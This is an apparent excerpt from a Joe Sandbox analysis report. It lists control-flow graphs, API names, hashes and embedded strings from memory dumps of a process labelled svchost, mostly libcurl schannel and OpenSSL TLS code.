                                                                                                                                                                                • String ID: SSL: failed retrieving public key from server certificate$SSL: public key does not match pinned public key$schannel: %s$schannel: Failed to read remote certificate context: %s$schannel: SNI or certificate check failed: %s$schannel: failed to receive handshake, SSL/TLS connection failed$schannel: failed to send next handshake data: sent %zd of %lu bytes$schannel: next InitializeSecurityContext failed: %s$schannel: unable to allocate memory$schannel: unable to re-allocate memory
                                                                                                                                                                                • API String ID: 726578228-413892695
                                                                                                                                                                                • Opcode ID: 5e13d3fd59f1fe3419bdb7664d0829cc75626017ba94fee8947fedc4d35b8d70
                                                                                                                                                                                • Instruction ID: 455c73642a9688bd00e6b833a74d63cb687d2318ae023926cbd74a1e7f902d9a
                                                                                                                                                                                • Opcode Fuzzy Hash: 5e13d3fd59f1fe3419bdb7664d0829cc75626017ba94fee8947fedc4d35b8d70
                                                                                                                                                                                • Instruction Fuzzy Hash: E3028F72A0978286EB608F29E4443AE77A4FB487C4F484036DB4E47795DF7CE54ADB08

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1466 7ff8b83ae4c0-7ff8b83ae4fe GetLastError _errno 1467 7ff8b83ae500-7ff8b83ae502 1466->1467 1468 7ff8b83ae507-7ff8b83ae518 1466->1468 1469 7ff8b83aea2e-7ff8b83aea4c call 7ff8b83c9e10 1467->1469 1470 7ff8b83ae51e 1468->1470 1471 7ff8b83ae8bc-7ff8b83ae8c2 1468->1471 1472 7ff8b83ae8b0-7ff8b83ae8b7 1470->1472 1473 7ff8b83ae524-7ff8b83ae52d 1470->1473 1475 7ff8b83ae936-7ff8b83ae93f 1471->1475 1476 7ff8b83ae8c4 1471->1476 1481 7ff8b83ae54f-7ff8b83ae55c call 7ff8b83af5b0 1472->1481 1477 7ff8b83ae533-7ff8b83ae543 1473->1477 1478 7ff8b83ae9be-7ff8b83ae9cb 1473->1478 1475->1478 1480 7ff8b83ae941-7ff8b83ae959 1475->1480 1482 7ff8b83ae8c6-7ff8b83ae8cc 1476->1482 1483 7ff8b83ae92a-7ff8b83ae931 1476->1483 1477->1481 1478->1481 1487 7ff8b83ae9d1-7ff8b83ae9e9 call 7ff8b8394eb0 1478->1487 1480->1478 1490 7ff8b83ae561-7ff8b83ae56d 1481->1490 1484 7ff8b83ae91e-7ff8b83ae925 1482->1484 1485 7ff8b83ae8ce-7ff8b83ae8d4 1482->1485 1483->1481 1484->1481 1488 7ff8b83ae912-7ff8b83ae919 1485->1488 1489 7ff8b83ae8d6-7ff8b83ae8dc 1485->1489 1497 7ff8b83ae9fb-7ff8b83aea0c _errno 1487->1497 1488->1481 1493 7ff8b83ae906-7ff8b83ae90d 1489->1493 1494 7ff8b83ae8de-7ff8b83ae8e4 1489->1494 1495 7ff8b83ae573-7ff8b83ae58d call 7ff8b8394eb0 1490->1495 1496 7ff8b83ae9eb-7ff8b83ae9f6 call 7ff8b8394eb0 1490->1496 1493->1481 1499 7ff8b83ae8e6-7ff8b83ae8e8 1494->1499 1500 7ff8b83ae8fa-7ff8b83ae901 1494->1500 1495->1497 1496->1497 1502 7ff8b83aea17-7ff8b83aea20 GetLastError 1497->1502 1503 7ff8b83aea0e-7ff8b83aea14 _errno 1497->1503 1499->1478 1504 7ff8b83ae8ee-7ff8b83ae8f5 1499->1504 1500->1481 1506 7ff8b83aea22-7ff8b83aea25 SetLastError 1502->1506 1507 7ff8b83aea2b 1502->1507 1503->1502 1504->1481 1506->1507 1507->1469
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast_errno
                                                                                                                                                                                • String ID: %s (0x%08X)$%s (0x%08X) - %s$CRYPT_E_NOT_IN_REVOCATION_DATABASE$CRYPT_E_NO_REVOCATION_CHECK$CRYPT_E_NO_REVOCATION_DLL$CRYPT_E_REVOCATION_OFFLINE$CRYPT_E_REVOKED$No error$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$SEC_I_CONTINUE_NEEDED$Unknown error
                                                                                                                                                                                • API String ID: 3939687465-2168394622
                                                                                                                                                                                • Opcode ID: e510bd89133b98551c2ded33f339925ccf4eb4118a24304ddea983bd7d095df7
                                                                                                                                                                                • Instruction ID: 31827b1ef14e75a84d4dd2d3728b9003bc6cb65e55529d61c8b26c4fc6afbc5a
                                                                                                                                                                                • Opcode Fuzzy Hash: e510bd89133b98551c2ded33f339925ccf4eb4118a24304ddea983bd7d095df7
                                                                                                                                                                                • Instruction Fuzzy Hash: 08517C62A1CA4785FA649B4EE8442BD22A6BF4C7C0F8C5435DB0E02291EF3DF597D718

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1508 7ff8b8362a50-7ff8b8362a9b calloc 1509 7ff8b8362bf4-7ff8b8362bfd _errno 1508->1509 1510 7ff8b8362aa1-7ff8b8362b20 malloc 1508->1510 1511 7ff8b8362bff-7ff8b8362c1b 1509->1511 1512 7ff8b8362b63-7ff8b8362b6b 1510->1512 1513 7ff8b8362b22-7ff8b8362b4d InitializeCriticalSectionEx call 7ff8b83ab3f0 1510->1513 1515 7ff8b8362b6d-7ff8b8362b73 closesocket 1512->1515 1516 7ff8b8362b7b-7ff8b8362b82 1512->1516 1522 7ff8b8362c1c-7ff8b8362c30 _strdup 1513->1522 1523 7ff8b8362b53-7ff8b8362b5b 1513->1523 1515->1516 1518 7ff8b8362b94-7ff8b8362ba5 free 1516->1518 1519 7ff8b8362b84-7ff8b8362b8e DeleteCriticalSection free 1516->1519 1520 7ff8b8362bac-7ff8b8362bb4 1518->1520 1521 7ff8b8362ba7 call 7ff8b83716c0 1518->1521 1519->1518 1525 7ff8b8362bbc-7ff8b8362bee free 1520->1525 1526 7ff8b8362bb6 closesocket 1520->1526 1521->1520 1522->1512 1527 7ff8b8362c36-7ff8b8362c56 free _strdup 1522->1527 1523->1512 1525->1509 1526->1525 1528 7ff8b8362c58-7ff8b8362c67 call 7ff8b83748e0 1527->1528 1529 7ff8b8362c84-7ff8b8362c8e 1527->1529 1533 7ff8b8362c6c-7ff8b8362c72 1528->1533 1531 7ff8b8362c90-7ff8b8362cb8 EnterCriticalSection LeaveCriticalSection 1529->1531 1532 7ff8b8362d02-7ff8b8362d1d free 1529->1532 1534 7ff8b8362ccb-7ff8b8362cce 1531->1534 1535 7ff8b8362cba-7ff8b8362cc2 call 7ff8b8374920 1531->1535 1532->1509 1539 7ff8b8362cc4-7ff8b8362cc6 1533->1539 1540 7ff8b8362c74-7ff8b8362c81 _errno 1533->1540 1537 7ff8b8362cd8-7ff8b8362ce8 call 7ff8b83628c0 free 1534->1537 1538 7ff8b8362cd0-7ff8b8362cd3 call 7ff8b8374930 1534->1538 1544 7ff8b8362cee-7ff8b8362cfc call 7ff8b83978b0 closesocket 1535->1544 1537->1544 1538->1537 1539->1511 1540->1529 1544->1532
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$CriticalSection$closesocket$_errno_strdup$DeleteEnterInitializeLeavecallocmallocsocket
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 941918121-0
                                                                                                                                                                                • Opcode ID: 5dd172aefddb53d8f8c9495c5f9d2f36a9664830b82f3b468a5f7e59bfdc3a19
                                                                                                                                                                                • Instruction ID: 3de649e0b44e137e8c010d0ec000f9fd73be4af5a70921cf168dc0c21cd970e9
                                                                                                                                                                                • Opcode Fuzzy Hash: 5dd172aefddb53d8f8c9495c5f9d2f36a9664830b82f3b468a5f7e59bfdc3a19
                                                                                                                                                                                • Instruction Fuzzy Hash: 4D816226909B8283E664DF29E8502697760FB98BA4F095335DBAE037A1DF3CF0D5C304

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1662 7ff8b83c15d0-7ff8b83c164d call 7ff8b83c4a40 call 7ff8b83c4a20 call 7ff8b83bc700 1669 7ff8b83c164f-7ff8b83c1659 call 7ff8b8374b60 1662->1669 1670 7ff8b83c165e-7ff8b83c1662 1662->1670 1669->1670 1672 7ff8b83c1664-7ff8b83c1684 GetModuleHandleW GetProcAddress 1670->1672 1673 7ff8b83c16ae 1670->1673 1672->1673 1674 7ff8b83c1686-7ff8b83c16a8 call 7ff8b83bc700 1672->1674 1675 7ff8b83c16b0-7ff8b83c16b7 1673->1675 1674->1673 1682 7ff8b83c16aa-7ff8b83c16ac 1674->1682 1677 7ff8b83c16c3-7ff8b83c16e5 call 7ff8b83bc700 1675->1677 1678 7ff8b83c16b9-7ff8b83c16bd 1675->1678 1685 7ff8b83c16eb 1677->1685 1686 7ff8b83c1a1c-7ff8b83c1a2b call 7ff8b8374a70 1677->1686 1678->1677 1680 7ff8b83c16bf-7ff8b83c16c1 1678->1680 1683 7ff8b83c16ed-7ff8b83c16f8 1680->1683 1682->1675 1687 7ff8b83c1734-7ff8b83c173a call 7ff8b83c0380 1683->1687 1688 7ff8b83c16fa-7ff8b83c171b call 7ff8b83c5af0 call 7ff8b83c53d0 1683->1688 1685->1683 1696 7ff8b83c1a30-7ff8b83c1a59 call 7ff8b83c9e10 1686->1696 1694 7ff8b83c173f-7ff8b83c1745 1687->1694 1703 7ff8b83c1727-7ff8b83c1732 call 7ff8b83c5b20 1688->1703 1704 7ff8b83c171d-7ff8b83c1724 1688->1704 1694->1696 1697 7ff8b83c174b-7ff8b83c1752 1694->1697 1700 7ff8b83c1757-7ff8b83c176a call 7ff8b83726d0 1697->1700 1701 7ff8b83c1754 1697->1701 1708 7ff8b83c1770-7ff8b83c1774 1700->1708 1709 7ff8b83c18b9-7ff8b83c18be 1700->1709 1701->1700 1703->1687 1703->1708 1704->1703 1711 7ff8b83c1776-7ff8b83c1780 call 7ff8b8374b60 1708->1711 1712 7ff8b83c1785-7ff8b83c1789 1708->1712 1709->1696 1711->1712 1714 7ff8b83c183b-7ff8b83c1852 1712->1714 1715 7ff8b83c178f-7ff8b83c17a9 call 7ff8b83c4040 1712->1715 1716 7ff8b83c1859-7ff8b83c1885 1714->1716 1723 7ff8b83c17c4-7ff8b83c1839 memmove call 7ff8b83bc980 call 7ff8b83c4100 call 7ff8b8374b60 1715->1723 1724 7ff8b83c17ab-7ff8b83c17bf call 7ff8b8374a70 1715->1724 1718 7ff8b83c1887 1716->1718 1719 7ff8b83c188e-7ff8b83c18a8 calloc 1716->1719 1718->1719 1721 7ff8b83c18c3-7ff8b83c1924 1719->1721 1722 7ff8b83c18aa-7ff8b83c18b4 call 7ff8b8374a70 1719->1722 1732 7ff8b83c1926-7ff8b83c1951 free call 7ff8b83ae4c0 1721->1732 1733 7ff8b83c199d-7ff8b83c19df call 7ff8b8368c60 1721->1733 1722->1709 1723->1716 1724->1696 1740 7ff8b83c1953-7ff8b83c1959 1732->1740 1741 7ff8b83c1987-7ff8b83c1998 call 7ff8b8374a70 1732->1741 1747 7ff8b83c1a03-7ff8b83c1a1a call 7ff8b8374a70 1733->1747 1748 7ff8b83c19e1-7ff8b83c19e4 1733->1748 1743 7ff8b83c1971-7ff8b83c1982 call 7ff8b8374a70 1740->1743 1744 7ff8b83c195b-7ff8b83c196c call 7ff8b8374a70 1740->1744 1741->1696 1743->1696 1744->1696 1747->1696 1748->1747 1752 7ff8b83c19e6-7ff8b83c1a01 1748->1752 1752->1696
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ConditionMask$AddressHandleInfoModuleProcVerifyVersionmemmove$ErrorLast_errnocallocfreememset
                                                                                                                                                                                • String ID: ALPN: curl offers %s$Error setting ALPN$ntdll$schannel: SNI or certificate check failed: %s$schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc.$schannel: failed to send initial handshake data: sent %zd of %lu bytes$schannel: initial InitializeSecurityContext failed: %s$schannel: this version of Windows is too old to support certificate verification via CA bundle file.$schannel: unable to allocate memory$schannel: using IP address, SNI is not supported by OS.$wine_get_version
                                                                                                                                                                                • API String ID: 3185706071-3097429119
                                                                                                                                                                                • Opcode ID: 8c82e870326bf8876d0f3e73c66640cce64f9c7c546961c902c082b54de352e1
                                                                                                                                                                                • Instruction ID: ed5ab27e37b4cf44a495d7acb6b413b7248ec2d276f25d20f9dc7743c2664b9e
                                                                                                                                                                                • Opcode Fuzzy Hash: 8c82e870326bf8876d0f3e73c66640cce64f9c7c546961c902c082b54de352e1
                                                                                                                                                                                • Instruction Fuzzy Hash: 50D17D76A08B418AFB609B29E4402AE37A4FB487C8F484035DF4D07795DF7CE55ADB48

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                • Opcode ID: c2cf571b473b600d14f1cf2488f9b52d1e09685eed8be68ba074785879acab16
                                                                                                                                                                                • Instruction ID: cc0a2b6f4c48c9d0d315a1717b311a2e97f28c62444651815636dcde8ae5fd78
                                                                                                                                                                                • Opcode Fuzzy Hash: c2cf571b473b600d14f1cf2488f9b52d1e09685eed8be68ba074785879acab16
                                                                                                                                                                                • Instruction Fuzzy Hash: 2B91FF35709A8293E64CAB69D6901FDA361FB8DBD1F080035EB6E43B51CF2CA1738749

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1818 7ff8a9339940-7ff8a93399ba call 7ff8a935edf0 1821 7ff8a9339a1b-7ff8a9339a30 call 7ff8a9337890 1818->1821 1822 7ff8a93399bc-7ff8a93399c4 EVP_CIPHER_CTX_get0_cipher 1818->1822 1825 7ff8a9339a33-7ff8a9339a35 1821->1825 1822->1821 1823 7ff8a93399c6-7ff8a93399e2 EVP_CIPHER_CTX_get0_cipher EVP_MD_get_size 1822->1823 1823->1821 1824 7ff8a93399e4-7ff8a9339a16 ERR_new ERR_set_debug call 7ff8a9337530 1823->1824 1828 7ff8a9339cb8-7ff8a9339cd5 1824->1828 1827 7ff8a9339a3b-7ff8a9339a72 1825->1827 1825->1828 1827->1828 1836 7ff8a9339a78-7ff8a9339aa0 memset 1827->1836 1830 7ff8a9339cd7-7ff8a9339cdb 1828->1830 1831 7ff8a9339cf6-7ff8a9339d15 call 7ff8a935ee50 1828->1831 1832 7ff8a9339ce0-7ff8a9339cf4 call 7ff8a92d13a0 1830->1832 1832->1831 1839 7ff8a9339aa6-7ff8a9339aaa 1836->1839 1840 7ff8a9339c35-7ff8a9339c38 1836->1840 1841 7ff8a9339ab1-7ff8a9339ab9 1839->1841 1842 7ff8a9339c3e-7ff8a9339c6c 1840->1842 1843 7ff8a9339d31-7ff8a9339d6c 1840->1843 1844 7ff8a9339abb-7ff8a9339ac0 1841->1844 1845 7ff8a9339ac2-7ff8a9339ad1 1841->1845 1853 7ff8a9339d2c 1842->1853 1854 7ff8a9339c72-7ff8a9339c79 1842->1854 1851 7ff8a9339d6e-7ff8a9339d75 1843->1851 1852 7ff8a9339d91-7ff8a9339da0 1843->1852 1847 7ff8a9339ad5-7ff8a9339ae3 1844->1847 1845->1847 1849 7ff8a9339ae5-7ff8a9339af2 1847->1849 1850 7ff8a9339af4 1847->1850 1858 7ff8a9339af8-7ff8a9339b24 1849->1858 1850->1858 1856 7ff8a9339cad-7ff8a9339cb0 1851->1856 1857 7ff8a9339d7b-7ff8a9339d8c ERR_new 1851->1857 1859 7ff8a9339e1e 1852->1859 1860 7ff8a9339da2-7ff8a9339dad 1852->1860 1853->1843 1855 7ff8a9339c7b-7ff8a9339c87 ERR_new 1854->1855 1854->1856 1861 7ff8a9339c8c-7ff8a9339c98 ERR_set_debug 1855->1861 1856->1828 1857->1861 1858->1856 1870 7ff8a9339b2a-7ff8a9339b4c 1858->1870 1863 7ff8a9339db4-7ff8a9339db7 1860->1863 1864 7ff8a9339c9e-7ff8a9339ca8 call 7ff8a9337530 1861->1864 1866 7ff8a9339db9-7ff8a9339dbe 1863->1866 1867 7ff8a9339dc0-7ff8a9339dcf 1863->1867 1864->1856 1869 7ff8a9339dd3-7ff8a9339df0 1866->1869 1867->1869 1869->1856 1882 7ff8a9339df6-7ff8a9339e1c 1869->1882 1871 7ff8a9339baa-7ff8a9339bad 1870->1871 1872 7ff8a9339b4e-7ff8a9339b63 COMP_compress_block 1870->1872 1876 7ff8a9339baf-7ff8a9339bbf call 7ff8a92d17c0 1871->1876 1877 7ff8a9339bcc-7ff8a9339bda 1871->1877 1874 7ff8a9339b82-7ff8a9339ba5 ERR_new ERR_set_debug 1872->1874 1875 7ff8a9339b65-7ff8a9339b80 call 7ff8a92d1350 1872->1875 1874->1864 1875->1874 1875->1877 1885 7ff8a9339d16-7ff8a9339d27 ERR_new 1876->1885 1886 7ff8a9339bc5-7ff8a9339bc8 1876->1886 1879 7ff8a9339bdc-7ff8a9339bee 1877->1879 1880 7ff8a9339bf4-7ff8a9339c12 1877->1880 1879->1856 1879->1880 1880->1856 1889 7ff8a9339c18-7ff8a9339c2f 1880->1889 1882->1859 1882->1863 1885->1861 1886->1877 1889->1840 1889->1841
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270001047.00007FF8A92D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269982680.00007FF8A92D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270048579.00007FF8A9360000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270075892.00007FF8A938D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270095241.00007FF8A9391000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a92d0000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: R_new$R_set_debug$X_get0_cipher$D_get_sizeP_compress_blockR_vset_errormemset
                                                                                                                                                                                • String ID: ssl\record\methods\tls_common.c$tls_write_records_default
                                                                                                                                                                                • API String ID: 909859927-3970931601
                                                                                                                                                                                • Opcode ID: 1151bc5a76b257bebab38f2b3411b41006c6163fbd03b349323ada81ee6bbd9b
                                                                                                                                                                                • Instruction ID: f057f5a9f2c5d5fa1953e98bd251ad509c7f5a279f353cdad6d2f5bfbc236013
                                                                                                                                                                                • Opcode Fuzzy Hash: 1151bc5a76b257bebab38f2b3411b41006c6163fbd03b349323ada81ee6bbd9b
                                                                                                                                                                                • Instruction Fuzzy Hash: 93D12936A0EBC2E5EB209F62E4401AA67B4FB88BC4F545136DE4E97B98DF38D155C700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strdupcallocfreestrncmp
                                                                                                                                                                                • String ID: Could not resolve %s: %s$Failed to resolve %s '%s' with timeout after %lld ms$Unix socket path too long: '%s'$anonymous$host$localhost/$proxy
                                                                                                                                                                                • API String ID: 2270677362-4063513385
                                                                                                                                                                                • Opcode ID: 326203549a5d4ca9c89f4e20dad48855f7beb3b9bf3fd66371582f1a841af4cb
                                                                                                                                                                                • Instruction ID: 03fe457bafb7011e29a366948da33396ac141a6d1ea21b1d613bf19e9505c3c4
                                                                                                                                                                                • Opcode Fuzzy Hash: 326203549a5d4ca9c89f4e20dad48855f7beb3b9bf3fd66371582f1a841af4cb
                                                                                                                                                                                • Instruction Fuzzy Hash: D651AF61A0DA868AFB618B2994103B92761EB4DBC8F4C4035DF4D4B795EF3DE987C704
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CounterPerformanceQuery
                                                                                                                                                                                • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed
                                                                                                                                                                                • API String ID: 2783962273-3359130258
                                                                                                                                                                                • Opcode ID: d4d6070547d8f764b8da05f4f463331d8d1d42f47e3350d5385058d322d2e82b
                                                                                                                                                                                • Instruction ID: cd9d6a779b2414d4488c4d254cc79513fc24b24191af08015d184503409641ab
                                                                                                                                                                                • Opcode Fuzzy Hash: d4d6070547d8f764b8da05f4f463331d8d1d42f47e3350d5385058d322d2e82b
                                                                                                                                                                                • Instruction Fuzzy Hash: 6E329B62B0CA858AFB119F6DD4402BC77A1AB08BD8F084235DF5D27B99DF39E552C348
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF8A7FB021A,?,?,?,00007FF8A7FB019D), ref: 00007FF8A7FAFB0D
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00000000,00007FF8A7FB021A,?,?,?,00007FF8A7FB019D), ref: 00007FF8A7FAFB1F
                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF8A7FB021A,?,?,?,00007FF8A7FB019D), ref: 00007FF8A7FAFB61
                                                                                                                                                                                • VirtualProtect.KERNEL32 ref: 00007FF8A7FAFBBD
                                                                                                                                                                                • VirtualProtect.KERNEL32 ref: 00007FF8A7FAFBEE
                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,00000000,00007FF8A7FB021A,?,?,?,00007FF8A7FB019D), ref: 00007FF8A7FAFC32
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,00000000,00007FF8A7FB021A,?,?,?,00007FF8A7FB019D), ref: 00007FF8A7FAFC3E
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
